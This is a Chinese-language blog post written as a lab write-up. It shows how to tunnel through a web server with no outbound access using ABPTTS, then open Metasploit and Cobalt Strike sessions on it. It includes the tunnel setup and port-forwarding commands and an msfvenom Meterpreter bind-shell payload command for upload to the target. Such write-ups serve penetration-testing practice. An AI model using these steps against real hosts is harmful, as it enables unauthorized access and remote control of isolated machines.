ABPTTS通过Http隧道上线

简介: 实战中经常会遇到目标主机不出网的情况,如果目标机器开放了web服务,可以通过构造正向http隧道进行上线,如果机器处于内网环境,可通过一台可出网的跳板机将其带出去,这只是个人的小想法...

一、实战环境简述:

实战中经常会遇到目标主机不出网的情况,如果目标机器开放了web服务,可以通过构造正向http隧道进行上线,如果机器处于内网环境,可通过一台可出网的跳板机将其带出去,这只是个人的小想法...


本次实验环境:

目标机器是web服务器,icmp、udp等协议都不能出网,唯一突破口就是可通过80端口,搭建正向的http隧道,可利用工具有Tunna、reDuh、ABPTTS等等,但是前两个貌似不太稳定,所以本次将使用ABPTTS进行实验(很大原因是因为没用过hahaha...),但是可惜的是,ABPTTS只支持aspx和jsp。



二、构建http隧道-->上线:

1、配置abptts:

①安装依赖



pip2 install httplib2pip2 install pycrypto

②运行脚本生成服务端脚本


python2 abpttsfactory.py -o server

会在当前目录下生成server的文件夹,脚本在里面


2、启动http隧道:

①上传server脚本到目标机器


②vps启动客户端连接


python2 abpttsclient.py -c server/config.txt -u "http://192.168.1.80/abptts.aspx" -f 127.0.0.1:7777(攻击者vps7777)/127.0.0.1:8888(这里是目标主机的8888)

将目标本地8888端口流量转发到abptts客户端本地7777端口上




3、上线MSF:

①生成bind的payload


msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1(监听目标本地) lport=8888 -f exe -o http.exe


msf开启监听abptts客户端程序所在机器的7777端口即可,我这里msf和abptts在同一台机器,所以设置为127.0.0.1,如果不在同一台机器,只需要设置为abptts客户端的ip即可


②把payload上传到目标主机执行


成功通过http隧道上线不出网主机

此时的流量走向:abptts客户端本地7777--->目标机器本地8888



4、上线cobalt strike:

因为CS的bind类型的Listener有TCP beaconr和SMB beacon,都必须连接到已有的beacon,所以我们需要已有的beacon进行中转连接

①上线本机


②生成bind类型的linstener


生成木马,然后上传到目标执行


利用父beacon执行连接,这里的192.168.1.2是abptts客户端程序所在机器的ip


此时的流量走向:abptts客户端本地7777--->目标机器本地8888


执行成功会返回目标beacon,但是我这里没成功,大体的过程就是这样,可能是我哪里出错了(感觉可能是我的环境问题)....希望有师傅可以指出,本文只是抛砖引玉,利用其他工具也可以完成,实验过程中大大小小的问题也不少....还是要多动手,不能光眼睛会,下次见!

目录
相关文章
|
7月前
|
安全 Linux 网络安全
Linux使用HTTP隧道代理代码示例模版
Linux使用HTTP隧道代理代码示例模版
96 0
有HTTP代理池子,要怎么快速搭建隧道代理?| 纯技术分享
实际工作中我们基本都是直接用有隧道代理服务提供商的产品的。
|
7月前
|
数据安全/隐私保护
隧道代理比普通HTTP代理方便的原因是什么?
随着科技的进步和互联网的发展,越来越多的企业在业务上都需要用到代理,那么隧道代理比普通HTTP代理方便的原因是什么?那么小编接下来就跟大家介绍一下
78 1
隧道代理比普通HTTP代理方便的原因是什么?
|
7月前
|
数据采集 数据安全/隐私保护 Python
深度解析Python爬虫中的隧道HTTP技术
深度解析Python爬虫中的隧道HTTP技术
|
测试技术 数据库 Windows
利用goproxy http上线不出网主机
利用goproxy http上线不出网主机
117 0
|
移动开发 网络协议 数据安全/隐私保护
什么是HTTP隧道,怎么理解HTTP隧道呢?
什么是HTTP隧道,怎么理解HTTP隧道呢?
478 0
|
网络安全
如何批量检测隧道HTTP代理的可用性?
本质上来说,检测隧道HTTP代理的可用性就是检测HTTP代理的可用性
|
SQL Web App开发 前端开发
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
在运行一个group by的sql时,抛出以下错误信息: Task with the most failures(4):  -----Task ID:  task_201411191723_723592_m_000004URL:  http://DDS0204.
977 0
|
Java Apache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html><head><meta http-equiv="Cont
hbase从集群中有8台regionserver服务器,已稳定运行了5个多月,8月15号,发现集群中4个datanode进程死了,经查原因是内存 outofMemory了(因为这几台机器上部署了spark,给spark开的...
813 0